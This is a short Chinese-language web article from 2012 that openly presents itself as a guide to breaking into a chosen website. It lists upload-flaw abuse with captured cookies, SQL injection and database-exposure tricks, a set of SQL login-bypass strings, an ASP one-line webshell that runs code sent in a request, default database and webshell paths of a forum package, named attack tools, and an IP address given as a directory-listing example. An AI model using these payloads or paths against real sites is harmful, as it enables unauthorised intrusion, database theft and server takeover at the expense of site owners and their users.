揭開國內(nèi)外黑客入侵網(wǎng)站的常用方法
您當(dāng)前位置:首頁 > 紅訊頻道 > 網(wǎng)絡(luò)技術(shù)
紅軟基地 推薦
2012-01-18
如何入侵指定網(wǎng)站!
首先,觀察指定網(wǎng)站。
入侵指定網(wǎng)站是需要條件的:
要先觀察這個網(wǎng)站是動態(tài)還是靜態(tài)的。
首先介紹下什么樣站點可以入侵:我認為必須是動態(tài)的網(wǎng)站 如ASP、PHP、 JSP等代碼編寫的站點
如果是靜態(tài)的(.htm或html),一般是不會成功的。
如果要入侵的目標網(wǎng)站是動態(tài)的,就可以利用動態(tài)網(wǎng)站的漏洞進行入侵。
Quote:以下是入侵網(wǎng)站常用方法:
1.上傳漏洞
如果看到:選擇你要上傳的文件 [重新上傳]或者出現(xiàn)“請登陸后使用”,80%就有漏洞了!
有時上傳不一定會成功,這是因為Cookies不一樣.我們就要用WSockExpert取得Cookies.再用DOMAIN上傳.
2.注入漏洞
字符過濾不嚴造成的
3.暴庫:把二級目錄中間的/換成%5c
4.’or’=’or’這是一個可以連接SQL的語名句.可以直接進入后臺。我收集了一下。類似的還有:
’or’’=’ " or "a"="a ’) or (’a’=’a ") or ("a"="a or 1=1-- ’ or ’a’=’a
5.社會工程學(xué)。這個我們都知道吧。就是猜解。
6.寫入ASP格式數(shù)據(jù)庫。就是一句話木馬〈%execute request("value")%〉 (數(shù)據(jù)庫必需得是ASP或ASA的后綴)
7.源碼利用:一些網(wǎng)站用的都是網(wǎng)上下載的源碼.有的站長很懶.什么也不改
比如:默認數(shù)據(jù)庫,默認后臺地址,默認管理員帳號密碼等
8.默認數(shù)據(jù)庫/webshell路徑利用:這樣的網(wǎng)站很多/利人別人的
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb W7
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
工具:網(wǎng)站獵手 挖掘雞 明小子
9.查看目錄法:一些網(wǎng)站可以斷開目錄,可以訪問目錄。
210.37.95.65 images
來源:紅訊頻道